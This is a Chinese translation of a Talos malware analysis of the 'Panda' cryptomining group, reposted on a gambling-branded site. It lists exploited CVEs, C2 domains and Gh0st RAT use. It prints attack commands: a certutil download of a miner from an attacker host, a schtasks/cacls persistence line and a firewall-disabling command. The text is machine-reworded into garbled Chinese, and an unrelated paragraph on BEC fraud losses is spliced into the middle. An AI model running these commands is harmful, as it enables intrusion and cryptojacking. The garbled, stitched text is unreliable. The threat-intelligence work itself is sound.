活泼在挖矿一线、简朴却贪欲的“Panda”构造 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

活泼在挖矿一线、简朴却贪欲的“Panda”构造

申博_新闻事件 申博 57次浏览 未收录 0个评论

择要

2018年中旬,Talos平安团队在“MassMiner”挖矿运动(MassMiner是一个挖矿歹意软件家属,经由过程大批差别的破绽举行流传,还暴力进击Microsoft SQL Server)中注重到一个名为“Panda”的新要挟团伙。

“Panda”所运用的手艺东西并不庞杂,无外乎是长途接见东西(RAT)和不法挖矿软件,倒是我们看到的最活泼的进击者之一,迄今为止已制造了代价数十万美圆的加密钱银,别的值得注重的是他们的行为——在环球局限内延续应用着易受进击的web应用程序,而遍历网络的东西和对RAT的运用,也意味着环球的构造都面临着将其体系资本滥用于挖矿的风险,以至更糟,比方泄漏代价信息等。

Panda常常更新他们的基本设施、破绽应用和payload,影响局限包括银行、医疗保健、交通、电信和IT效劳等行业的构造机构。

活泼在挖矿一线、简朴却贪欲的“Panda”构造

初次发明“Panda”

2018年7月,我们初次视察到了“Panda”要挟构造,其进击流程是先运用massscan寻觅种种易受进击的效劳器,然后应用几种差别的破绽,比方WebLogic破绽(CVE-2017-10271)和Apache Struts 2中的长途代码实行破绽(CVE-2017-5638),经由过程PowerShell post-exploit下载名为“downloader.exe”的挖矿软件payload,并将其以简朴的数字定名(比方“13.exe”)保存在TEMP文件夹中,以后再实行。我们观测到的样本是经由过程经由过程端口57890从list[.]idc3389[.]top或kingminer[.]club.中下载设置文件的,设置文件里指定了要运用的门罗币钱包及矿池。停止现在,我们预估Panda从中猎取的利润,按当前美圆来算的话应该有十万。

活泼在挖矿一线、简朴却贪欲的“Panda”构造

到了2018年10月,list[.]idc3389[.]top上的设置文件的下载量已凌驾30万次。

样本同时还会装置Gh0st RAT,它与rat[.]kingminer[.]club举行通讯。在别的一些变体中,我们还视察到一些其他的黑客东西和破绽应用的植入,包括凭据偷窃东西Mimikatz和方程式构造(Equation Group)的UPX加壳东西。样本还会经由过程端口445到172.105.X.X块中的IP地点扫描开放的SMB端口。

idc3389[.]top是Panda的C2域之一,由一名说中文的介入人注册,他的名字恰是“Panda”。

与Bulehero的联络

初次发明Panda进击的同一时间,在另一个C2域bulehero [.] in中我们视察到异常相似的TTP。进击者运用PowerShell从b[.]bulehero[.]in中下载名为“download.exe”的文件,一样将其保存为以简朴数字定名的文件(如“13.exe”)并实行。

活泼在挖矿一线、简朴却贪欲的“Panda”构造

在沙箱环境中,我们视察了几个将它关联到初期MassMiner运动的特性。起首,它经由过程先前视察到的端口57890,GET要求一个名为cfg.ini的文件,该文件托管在bulehero[.]in的一个子域上:c[.]bulehero[.]in。与MassMiner一致,设置文件指定原始样本所来自的站点,以及用于采矿的钱包和矿池。

另外,样本会试图运用诸如“cmd / c net stop MpsSvc”之类的敕令封闭受害者的防火墙。歹意软件还会修正接见掌握列表,经由过程运转cacsl.exe授与某些文件的完整接见权限。

比方:

cmd / c schtasks / create / sc minute / mo 1 / tn“Netframework”/ ru system / tr“cmd / c echo Y | cacls C:Windowsappveif.exe / p everyone:F

而在先前的MassMiner感染中也视察到这两种行为。

样本还会向ip138 [.] com发出GET要求名为ic.asp的资本,此ip地舆定位为中文,该资本以中文的情势供应机械的IP地点和位置,而在MassMiner运动中也视察到了此行为。

另外,appveif.exe会在体系目次中建立很多文件,个中很多文件被多个AV引擎肯定为歹意文件,而且好像与MassMiner运动中的破绽应用相匹配。比方我们检测到几个东西都与“Shadow Brokers”构造的破绽应用相干,而且这些文件都装置在一个具有可疑称号的目次中:“WindowsInfusedAppeEternalblue139specials”。

“Panda”的进化

贸易电子邮件欺骗丧失已达260亿美圆!如安在遭遇敲诈后疾速施救?

FBI:BEC诈骗总损失超过260亿美元 近日,美国联邦调查局(FBI)发布了过去六年最新的BEC诈骗(商业电子邮件诈骗)统计数据,FBI互联网犯罪投诉中心(IC3)表示,BEC诈骗活动每年都在继续增长,2018年5月至2019年7月期间,经确认的全球已知损失增加了100%。此外,在2016年6月至2019年7月期间,IC3收到了16.6万起国内和国际事件的受害者投诉,总损失超过260亿美元。 众所周知,这些丢失的资

在2019年1月,Talos视察到Panda应用ThinkPHP网络框架中最新表露的一个破绽(CNVD-2018-24942)来流传相似的歹意软件。

ThinkPHP是一个在中国盛行的开源Web框架,应用此破绽,可直接从a46[.]bulehero[.]in中下载“download.exe”。Panda还将一个简朴的PHP Web shell上传到途径“/public/hydra.php”,用于挪用PowerShell来下载雷同的可实行文件。web shell仅供应了经由过程对“/public/hydra.php”HTTP要求中的URL参数挪用恣意体系敕令的才能。Download.exe将下载不法挖矿软件payload,并有SMB扫描的行为,这是Panda横向挪动的证实。

2019年3月,Panda更换了新的基本设施,包括域hognoob[.]se的各个子域。当时托管初始payload的域fid[.]hognoob[.]se,剖析为IP地点195[.]128[.]126[.]241,也与bulehero[.]in的几个子域相干联。

3月时Panda的TTP与之前的相似。破绽应用后,Panda挪用PowerShell从URL hxxp://fid[.]hognoob[.]se/download.exe下载名为“download.exe”的可实行文件,并将其保存在Temp文件夹中,不过文件名相较之前要变得庞杂很多,如“autzipmfvidixxr7407.exe”;以后此文件再从fid[.]hognoob[.]se下载名为“wercplshost.exe”的挖矿木马和从uio[.]hognoob[.]se下载设置文件“cfg.ini”。

活泼在挖矿一线、简朴却贪欲的“Panda”构造

“Wercplshost.exe”包括为横向挪动而设想的破绽应用模块,个中很多都与“Shadow Brokers”有关,还包括SMB暴力破解。能猎取受害者的内部IP,并以受害者的B类地点作为端口扫描的基本,向中文IP地舆位置站点2019[.]ip138[.]com猎取外部IP。它还运用开源东西Mimikatz来网络受害者的暗码。

今后不久,Panda最先更新了其payload,包括了一些新的功用,比方运用Certutil经由过程以下敕令下载次级矿机payload:

certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:WindowsTempupnpprhost.exe

矿机运转的敕令以下:

cmd /c ping 127.0.0.1 -n 5 & Start C:Windowsugrpkute[filename].exe

更新后的payload装置WinPcap和开源东西Masscan来扫描大众IP地点上的开放端口,并将效果保存为“Scant.txt”(注重拼写是毛病的),还将硬编码IP局限列表写入“ip.txt”,再将其通报给Masscan以扫描端口445,末了将效果保存到“results.txt”中。鉴于进击者有运用EternalBlue的汗青,此举的目标能够是为了找到易受MS17-010影响的机械。更新的payload在破绽应用模块上没有变化,也照样运用Mimikatz来网络受害者暗码。

6月,Panda最先针对较新的WebLogic破绽CVE-2019-2725,但战略依旧稳定。

近期运动

在过去的一个月里,Panda最先采纳新的C2和托管payload的装备。我们视察到进击者从hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe中下载payload并将其保存为随机的20个字符的称号,前15个字符由a到z构成,末了五个由数字构成(如“xblzcdsafdmqslz19595.exe”),再经由过程PowerShell实行此文件。Wiu[.]fxxxxxxk[.]me剖析为IP 3[.]123[.]17[.]223,与Panda的旧C2 ,如a46[.]bulehero[.]in和 fid[.]hognoob[.]se相干联。

除了新的基本设施,payload与他们在2019年5月最先运用的payload相似,包括运用Certutil下载位于hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe 的次级矿机payload,以及运用ping来耽误实行payload。该样本还包括Panda以往的横向挪动模块、Shadow Brokers的破绽应用和Mimikatz。

区别是,新样本中包括Gh0st RAT默许互斥锁“DOWNLOAD_SHELL_MUTEX_NAME”,互斥锁称号列为fxxk[.]noilwut0vv[.]club:9898;还向IP 46[.]173[.]217[.]80发出DNS要求,此IP也与fxxxxxxk[.]me和hognoob[.]se的几个子域相干联。而挖矿行为和Gh0st RAT的连系,也代表着Panda初期行为的回归。

2019年8月19日,我们视察到Panda在C2和payload托管装备存中添加了另一组域。与之前的运动一致,进击者IP从URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe中下载payload,但文件不再保存为随机的20个字符的称号,而是“BBBBB”,域现在剖析为217[.]69[.]6[.]42。

初始payload运用Certutil下载位于http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe上的次级矿机payload,有一个设置为“oo[.]mygoodluck[.]best:51888:WervPoxySvc”的Gh0st RAT互斥锁,并为剖析为46[.]173[.]217[.]80的域发出DNS要求,个中包括fxxxxxxk[.]me和hognoob[.]se的多个子域,这两个子域都是Panda运用的已知域,新样本还连接了li[.]bulehero2019[.]club。

一样,新样本中也包括了Panda以往的横向挪动模块、Shadow Brokers的破绽应用和Mimikatz,另有用于矿机设置的INI文件,列出了矿池mi[.]oops[.]best和备份矿池mx[.]oops[.]best。

活泼在挖矿一线、简朴却贪欲的“Panda”构造

结论

Panda的运营平安性算是较差的,很多旧域和新域都托管在同一个IP上,而且他们的TTP在运动中坚持了高度相似性,payload也不是很庞杂。

然则,我们照样不该低估要挟行为者经由过程一些普遍散布的东西(如Mimikatz)所形成的损伤和影响。Panda运用的文件效劳器也表明,这类歹意软件具有普遍的影响力。我们对Panda的收益举行了大略盘算,约有1,215 XMR,换算成美圆大约为10万美圆。

Panda依旧是当前介入不法挖矿行为的最活泼的行为者之一,且常常转变基本装备和应用种种差别破绽,在大众POC可用后不久又很快最先应用起了已知破绽,对那些不常更新的用户而言无疑是一种平安隐患,而且,假如Panda能够感染受害者体系,那末另一个要挟行为者能够运用雷同的感染体式格局来通报其他歹意软件。

Talos将对Panda的运动坚持继承监控。

本文翻译自:https://blog.talosintelligence.com/2019/09/panda-evolution.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明活泼在挖矿一线、简朴却贪欲的“Panda”构造
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址